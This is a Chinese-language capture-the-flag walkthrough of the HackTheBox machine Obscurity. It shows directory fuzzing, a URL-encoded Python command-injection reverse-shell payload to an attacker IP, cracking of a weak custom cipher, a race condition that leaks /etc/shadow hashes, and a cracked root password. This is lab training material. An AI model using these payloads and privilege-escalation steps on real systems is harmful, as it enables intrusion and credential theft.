HackTheBox - ObSecurity
通过Nmap扫描开放了:
最后输出结果为
通过使用 watch命令,拷贝临时文件到父级目录
通过8080端口了以下信息:
大概意思就是说,为了安全,他自己用python写了个http服务器(最恶心这样的人了)
通过模糊扫描【SuperSecureServer.py】脚本文件,发现位于:
kali@kali:~/go/bin$ ./ffuf -u http://10.10.10.168:8080/FUZZ/SuperSecureServer.py -w /usr/share/dirb/wordlists/common.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.1.0-git
________________________________________________
:: Method : GET
:: URL : http://10.10.10.168:8080/FUZZ/SuperSecureServer.py
:: Wordlist : FUZZ: /usr/share/dirb/wordlists/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
develop [Status: 200, Size: 5892, Words: 1806, Lines: 171]
:: Progress: [4614/4614] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:39] :: Errors: 0 ::
最后构造成了这样的URL,万幸没有超过浏览器URL长度。以前开发见过有个100M的文件,通过URL编码传输的。。呵呵。
http://10.10.10.168:8080/';%20%20import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.231%22,1488));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%20%20output%20=%20'
进入到/home/robert/目录里发现有:
drwxr-xr-x 7 robert robert 4096 Dec 2 09:53 .
drwxr-xr-x 3 root root 4096 Sep 24 2019 ..
lrwxrwxrwx 1 robert robert 9 Sep 28 2019 .bash_history -> /dev/null
-rw-r--r-- 1 robert robert 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 robert robert 3771 Apr 4 2018 .bashrc
drwxr-xr-x 2 root root 4096 Dec 2 09:47 BetterSSH
drwx------ 2 robert robert 4096 Oct 3 2019 .cache
-rw-rw-r-- 1 robert robert 94 Sep 26 2019 check.txt
drwxr-x--- 3 robert robert 4096 Dec 2 09:53 .config
drwx------ 3 robert robert 4096 Oct 3 2019 .gnupg
drwxrwxr-x 3 robert robert 4096 Oct 3 2019 .local
-rw-rw-r-- 1 robert robert 185 Oct 4 2019 out.txt
-rw-rw-r-- 1 robert robert 27 Oct 4 2019 passwordreminder.txt
-rw-r--r-- 1 robert robert 807 Apr 4 2018 .profile
-rwxrwxr-x 1 robert robert 2514 Oct 4 2019 SuperSecureCrypt.py
-rwx------ 1 robert robert 33 Sep 25 2019 user.txt
import sys
import argparse
def encrypt(text, key):
keylen = len(key)
keyPos = 0
encrypted = ""
for x in text:
keyChr = key[keyPos]
newChr = ord(x)
newChr = chr((newChr + ord(keyChr)) % 255)
encrypted += newChr
keyPos += 1
keyPos = keyPos % keylen
return encrypted
def decrypt(text, key):
keylen = len(key)
keyPos = 0
decrypted = ""
for x in text:
keyChr = key[keyPos]
newChr = ord(x)
newChr = chr((newChr - ord(keyChr)) % 255)
decrypted += newChr
keyPos += 1
keyPos = keyPos % keylen
return decrypted
def decryptMain(out, check):
pos = 0;
str = "";
for e in out:
print(ord(out[pos]), end='\t')
print(ord(check[pos]), end='\t')
print(ord(out[pos]) - ord(check[pos]), end='\t')
print(chr(ord(out[pos]) - ord(check[pos])), end='\t')
str += chr(ord(out[pos]) - ord(check[pos]));
print()
pos+=1
print(str)
out = open("t1/out.txt", encoding='utf-8')
check = open("t1/check.txt", encoding='utf-8')
#encryptText = encrypt("ineedthekey", "thisiskey")
#decodeText = decrypt(encryptText, "thisiskey")
key = decryptMain(out.read(), check.read())
print(key)
总的来说,就是用加密后的十进制代码 减去 加密前的十进制 = 新的十进制。然后转为字符串就OK了
alexandrovichalexandrovichalexandrovichalexandrovichalexandrovichalexandrovichalexandrovichal
因为 passwordreminder.txt 没有密文输出文件。所以必须要知道前置条件这个游戏才能继续玩下去,所以拿那个密码去破解这个文件。
python3.6 ./SuperSecureCrypt.py -d -i passwordreminder.txt -k alexandrovich -o /tmp/1.txt;cat /tmp/1.txt
最后输出,SecThruObsFTW
成功取得 user.txt,不过显然root才是我的最终目的
robert@obscure:~$ cat user.txt
e4493782066b55fe2755708736ada2d7sf
robert@obscure:/etc$ sudo -l
Matching Defaults entries for robert on obscure:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User robert may run the following commands on obscure:
(ALL) NOPASSWD: /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py
robert@obscure:/etc$ sudo /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py
Enter username: robert
Enter password: SecThruObsFTW
Authed!
robert@Obscure$ whoami
Output: robert
通过使用 watch命令,拷贝临时文件到父级目录
robert@obscure:/tmp/SSH$ watch -n 0.1 -d cp * ../
robert@obscure:/tmp/SSH$ ls
robert@obscure:/tmp/SSH$ ls ../
1.txt shell.py systemd-private-ac6646370f9e4477886e7d9dbc1f7497-systemd-resolved.service-lKQoAD vmware-root_618-2697467179
nNQQZ8xv SSH systemd-private-ac6646370f9e4477886e7d9dbc1f7497-systemd-timesyncd.service-zztZA2
robert@obscure:/tmp/SSH$ cd ..
robert@obscure:/tmp$ ls -al
total 52
drwxrwxrwt 11 root root 4096 Apr 29 07:18 .
drwxr-xr-x 24 root root 4096 Oct 3 2019 ..
-rw-r--r-- 1 www-data www-data 14 Apr 29 05:51 1.txt
drwxrwxrwt 2 root root 4096 Apr 29 04:18 .font-unix
drwxrwxrwt 2 root root 4096 Apr 29 04:18 .ICE-unix
-rw-r--r-- 1 robert robert 249 Apr 29 07:18 nNQQZ8xv
-rw-r--r-- 1 www-data www-data 0 Apr 29 07:13 shell.py
drwxrwxr-x 2 robert robert 4096 Apr 29 07:18 SSH
drwx------ 3 root root 4096 Apr 29 04:18 systemd-private-ac6646370f9e4477886e7d9dbc1f7497-systemd-resolved.service-lKQoAD
drwx------ 3 root root 4096 Apr 29 04:18 systemd-private-ac6646370f9e4477886e7d9dbc1f7497-systemd-timesyncd.service-zztZA2
drwxrwxrwt 2 root root 4096 Apr 29 04:18 .Test-unix
drwx------ 2 root root 4096 Apr 29 04:18 vmware-root_618-2697467179
drwxrwxrwt 2 root root 4096 Apr 29 04:18 .X11-unix
drwxrwxrwt 2 root root 4096 Apr 29 04:18 .XIM-unix
robert@obscure:/tmp$ date
Wed Apr 29 07:18:38 UTC 2020
robert@obscure:/tmp$ cat nNQQZ8xv
root
$6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1
18226
0
99999
7
robert
$6$fZZcDG7g$lfO35GcjUmNs3PSjroqNGZjH35gN4KjhHbQxvWO0XU.TCIHgavst7Lj8wLF/xQ21jYW5nD66aJsvQSP/y1zbH/
18163
0
99999
7
kali@kali:/tmp$ /usr/sbin/john --show ~/Desktop/obsercurity/passwd
root:mercedes:18226:0:99999:7:::
评论
发表评论